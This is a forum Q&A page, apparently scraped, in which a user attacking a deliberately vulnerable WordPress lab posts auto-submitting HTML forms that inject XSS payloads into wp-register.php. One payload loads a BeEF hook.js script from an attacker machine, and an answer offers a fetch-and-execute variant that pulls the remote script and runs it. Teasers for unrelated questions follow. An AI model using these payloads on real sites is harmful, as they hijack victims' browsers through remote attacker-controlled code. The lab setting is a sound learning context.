Executing XSS Reflected Attack by Loading an External JS Script via POST Parameter

Experimenting with XSS attacks on my vbox machines, just for kicks! I have two .html files - one works and the other doesn't.

The file that works contains:

<html>
<head></head>
<body>
<form method="post" action="http://192.168.56.17/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

is where the OWASPBWA machines of vulnhub are located, featuring an old WP installation with XSS vulnerability in register.php

This one works. When I open this .html file from a different client, say 192.168.56.1, I get the javascript alert!

However, when I try something more malicious, like hooking beef-xss, the following code doesn't work as expected:

<html>
<head></head>
<body>
<form method="post" action="http://192.168.56.17/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='">example' />
<input type="hidden" name="user_email" id="user_email"
value='"><script src="http://192.168.56.101:3000/hook.js"></script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

192.168.56.101 is where my attacking box is located.

Thank you for your assistance

javascriptxss

Answer №1

It is my belief that you should switch the order of these 2 lines

<input type="hidden" name="user_login" id="user_login" value='">example' />
<input type="hidden" name="user_email" id="user_email" value='"><script src="http://192.168.56.101:3000/hook.js"></script>' />

The issue lies in '">example', which disrupts the code and allows the script tag to take precedence.

Another possible scenario could be,

<input type="hidden" name="user_login" id="user_login" value='"><script>alert(1)</script>' />

If the above code functions correctly, then attempting the javascript exec("") command within the value attribute might be worthwhile. I am uncertain if the script->src actually retrieves the resource.

Something along these lines

<input type="hidden" name="user_login" id="user_login" value='"><script>
fetch(&apos;location to your script:3000/hook.js &apos;)
.then(
response => {
response.text()
.then(a=> exec(a))

}
)</script>' />

Explanation: Explicitly fetch the script using the fetch API, then execute the string with exec("").. &apos and &quot are escape characters for ' and " respectively.

That is the best solution I can come up with.

Similar questions

If you have not found the answer to your question or you are interested in this topic, then look at other similar questions below or use the search

Setting the region in Firebase functions is not supported

I have encountered an issue while trying to set a deployment region for my functions. The documentation states that I should use the following code: var functions = firebase.app().functions('us-west2'); However, when I implement this and attemp ...

javascriptfirebasegoogle-cloud-functions

Exploring the capabilities of incorporating multiple nested if-else statements in an AJAX/JavaScript function

Can anyone help me with this code issue? I am trying to run a function with data received from a CI controller to ajax, but having trouble with multiple if else statements. The code works fine with one if else statement, but not with nested or multiple one ...

javascriptjqueryajax

Alternatives to AMP in AngularJS

My current project is based on Angular 1.x and I recently received advice from an SEO specialist to enhance the initial mobile load speed of my website. One suggestion was to implement AMP, but after some research, it appears that integrating AMP with Angu ...

javascriptangularjsperformancemobileamp-html

Require assistance with handling Ajax when a function with an Ajax call is repeatedly invoked

I am seeking guidance with ajax as I am still new to it. A problem arises when the same ajax call is made multiple times before the previous one completes its execution, resulting in an empty pop-up on the user interface. How can this issue be resolved? Es ...

javascriptjqueryajax

The battle between ui-sref-active and $state.includes() is a topic of

I am attempting to highlight the clicked area by adding an active class using ui-sref-active. Unfortunately, it is not working with $state.includes(), even though I can see its value as true in the controller. Can someone assist me with this issue? See th ...

javascriptangularjsangular-ui-router

Adhering button for sliding side panel

Check out my JSFiddle HERE to see what I have done. I would really appreciate it if someone could help me figure out how to make the show button float with the sidr panel :) <style type="text/css"> #panel { position: fixed; top: 50%; r ...

javascriptjqueryhtmlcss

What is the best way to update this payload object?

Currently, I'm developing a route and aiming to establish a generic normalizer that can be utilized before storing user data in the database. This is the function for normalization: import { INormalizer, IPayloadIndexer } from "../../interfaces/ ...

javascriptnode.jstypescriptexpresstypes

Tips for transforming a nested object into an array using JavaScript

I have a complex array containing multiple objects, each with two or more sub-objects. I am looking to consolidate all sub-objects into a single array of data using JavaScript. How can I achieve this? var array1 = [ { "dfgasg24":{ name:"a", ...

javascriptjqueryarrayslodash

A guide on adding two fields together in AngularJS and displaying the output in a label

I am facing a unique issue on my webpage. Including two inputs and a label in the page, I want the label to display the sum of the values entered into these two inputs. My initial attempt was as follows: Sub-Total <input type="text" ng-model="Propert ...

javascripthtmlangularjssum

When you add a new library using npm and it has a dependency on another existing library, it could potentially cause conflicts or issues with

After successfully installing a library, I am now looking to install another library that relies on the first one. I have some uncertainty about what will occur: The second library will utilize the shared library already installed for its functionality ...

javascriptnpm

Is it possible for Sequelize to utilize a getter or setter within a find query?

When it comes to storing and querying email addresses in my database, I always opt for lowercase strings to prevent duplicate emails such as <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="077274627547627f666a776b62d48ed88e5"> ...

javascriptnode.jspostgresqlexpresssequelize.js

Set the camera to view the world from a y-coordinate of 0 and descend

How can I make the top of the render area in Three.js point to y=0 in the world? I also want the camera to look straight (lookAt) These are my current values: camera = PerspectiveCamera camera.position.z = 1895.8448868133867 camera.fov = 20 screen.width ...

javascript3dthree.js

Utilize jQuery to extract data from a JSON object

While I have come across numerous examples of parsing JSON objects in jQuery using $.parseJSON and have grasped the concept, there are some fundamental aspects missing that are preventing me from successfully parsing the following VALID JSON: { "studen ...

javascriptjqueryjson

JavaScript: Identify the variable that has been updated

When checking for changes in the values of a couple of variables, I use the following condition: <% if (ctx.recipient.@firstName != ctx.recipient.@firstName_init || ctx.recipient.@lastName != ctx.recipient.@lastName_init || ctx.recipient.@emailPreferred ...

javascriptxml

Issue encountered while attempting to start npm: Error code from NPM

I keep encountering the npm ENOENT error every time I attempt to execute npm start. I am unsure of what steps to take in order to resolve this issue. I have made efforts to adjust folder permissions. bryantcaruthers-> npm start npm ERR! code ENOENT npm ...

javascriptnode.jsnpmbackend

Ensuring Form Integrity through jQuery Validation

I am struggling to customize the errorClass and validClass using JQuery validation. I believe that by adding the .validate function and setting the parameters, it should work. However, even though the validation message displays correctly, the classes re ...

javascriptjqueryasp.net-corejquery-validateunobtrusive-validation

Dealing with React Native text overflowing beyond the screen width when using FlexWrap

I'm currently working on implementing a component in react native that consists of a row containing and components, but I'm struggling to achieve the desired outcome. Here's my current code: <View style={{ flexDirection: ...

javascriptreactjsreact-nativeflexbox

PHP and MySQL form is not being updated with new data

In my database, the fields include: id,name,email_id,address,phone_no,username,password,category,date <?php include_once('connect_to_mysql.php'); if(isset($_POST["submit"])){ $a=mysql_real_escape_string($_POST["name"]); ...

javascriptphpmysqlhtml

Tips for revealing the pin after entering it into the text box

Is there a way to display the address inputted into 4 textboxes (with pin changing after onchange) on a Google map embedded on my website? I want to have 4 separate input fields for zip code, city, street, and house number. If all four boxes are filled out ...

javascriptgoogle-maps

Arrow function returns itself, not the function

While working with React, I've been using utility functions for managing API calls. I noticed that when the arrow function is no longer anonymous, it successfully returns a pending promise – which is exactly what I want. However, if the arrow functi ...

javascriptnode.jsreactjs